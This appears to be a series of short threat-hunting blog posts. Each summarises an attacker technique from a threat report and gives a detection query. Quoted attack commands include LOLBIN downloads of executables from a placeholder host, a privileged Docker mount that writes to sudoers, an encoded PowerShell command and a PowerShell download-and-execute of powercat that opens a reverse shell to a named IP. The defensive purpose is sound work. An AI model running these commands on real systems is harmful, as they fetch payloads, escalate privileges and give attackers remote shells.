Know Your Adversary

Hello everyone! In almost every case adversaries need to download additional tools to the compromised system. Very often they use LOLBINs to solve this task. Let's look at some of them. For example, according to this report , the adversary leveraged multiple LOLBINs: bitsadmin /transfer www /download http://<HOST>/winupdate.exe $public\libraries\winvt.exe curl -o $public\libraries\service.exe http://<HOST>/service.exe certutil -urlcache -f https://<HOST>/AkelPad.rar $public\libraries\AkelPad.rar powershell.exe -Command powershell -Command "Invoke-WebRequest -Uri 'https://<HOST>/winupdate.exe' -OutFile '$public\pictures\sbschost.exe' Such activities are great targets for hunting and detection. So, make sure you are covering it. For example, BITSAdmin: event_type: "processcreatewin" AND proc_file_path: "bitsadmin.exe" AND cmdline: "transfer" See you tomorrow!

Hello everyone! I'm sure you already heard about Shai-Hulud, we even talked about it already, but let's look at the new version, and focus on privilege escalation tactic. So, here's the report . Let's look at Figure 11. First, the adversary checks if passwordless sudo access is available: sudo -n true If not, it leverages Docker's privileged container access to mount the host filesystem and modify the sudoers configuration file: docker run --rm --privileged -v /:/host ubuntu bash -c "cp /host/tmp/runner /host/etc/sudoers.d/runner" Both can be good hunting opportunities! Let's start from sudo: event_type: "processcreatenix" AND cmdline: "sudo -n true" And for Docker abuse: event_type: "processcreatenix" AND cmdline: ("docker" AND "run" AND "privileged" AND "cp" AND "sudoers.d") See you tomorrow!

Hello everyone! Today we'll look at another example of proxy execution, and focus on the following sub-technique:  System Binary Proxy Execution: MMC (T1218.014) . According to this report , Water Gamayun leveraged malicious MSC files, which exploited MSC EvilTwin (CVE-2025-26633) to inject code into mmc.exe, leveraging TaskPad snap-in commands to run PowerShell commands, for example: powershell.exe" -w H -eC aQBlAHgAIAAoACcAcABvAF8AdwBlAF8AcgBzAF8AaABlAF8AbABsACAALQBlAF8AQwAgAFMAUQBCAHUAQQBIAFkAQQBiAF8AdwBCAHIAQQBHAFUAQQBMAFEAQgBYAEEARwBVAEEAWQBnAEIAUwBBAEcAVQBBAGMAUQBfAEIAMQBBAEcAVQBBAGMAdwBCADAAQQBDAEEAQQBMAFEAQg[redacted] So, in this case, mmc.exe spawns powershell.exe. We can transform it into a query: event_type: "processcreatewin" AND proc_p_file_path: "mmc.exe" AND proc_file_path: "powershell.exe" See you tomorrow!

Hello everyone! We often use Windows Event Logs during our incident response engagements, but adversaries may also use it, for example, for discovery. Let's dig into this report . The adversary leveraged SharpADUserIP, which enables them to collect information about user names and their IP addresses from Security log, as we as the following PowerShell command to extract similar information from Microsoft-Windows-TerminalServices-LocalSessionManager/Operational: powershell -Command Get-WinEvent -LogName 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' | Where-Object {$_.Id -eq 21} | ForEach-Object { $eventXml = [xml]$_.ToXml(); $username = $eventXml.Event.UserData.EventXML.User; $ipAddress = $eventXml.Event.UserData.EventXML.Address; $loginTime = $_.TimeCreated; if ($username -and $ipAddress -and $loginTime) { Write-Output ('User: ' + $username + ' IP: ' + $ipAddress + ' Login Time: ' + $loginTime) }} So, we can hunt for suspicious...

Hello everyone! I always love to see creative ways of malware delivery. Thie time adversaries leveraged malicious .blend files uploaded to free 3D assets sites. According to the report , embedded Python script fetched a loader from workers[.]dev URL, which is a PowerShell script. The script downloads two archives: one contains a Python environment with StealC, the other - a Python Stealer. So, what to hunt for? Some examples: - Execution of suspicious .blend files. - Communications with workers[.]dev initiated by suspicious processes. - Suspicious LNK files in the Startup folder. - Execution of suspicious Python scripts (Yes, they are, for example, ZalypaGyliveraV1.py). See you tomorrow!

Hello everyone! I mentioned already that sometimes threat actors want to be caught. Let's look at another case and a tool I don't often see to be used ITW. According to this report , the adversary leveraged PowerShell to download and execute PowerCat - an open-source PowerShell-based Netcat utility to start a reverse shell: powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString (‘hxxps://raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat.ps1&#8217;); powercat -c 154.17.26[.]41 -p 8080 -e cmd As you may have noticed, the adversary don't rename the tool. And in many cases it's a very common practice. The same can be said about the repository - threat actors often abuse PowerShell to download tools from official sources. So, it's another notable thing to document and build your detections, for example: event_type: "processcreatewin" AND cmdline: "powercat" Don't forget about the script block - it also contains...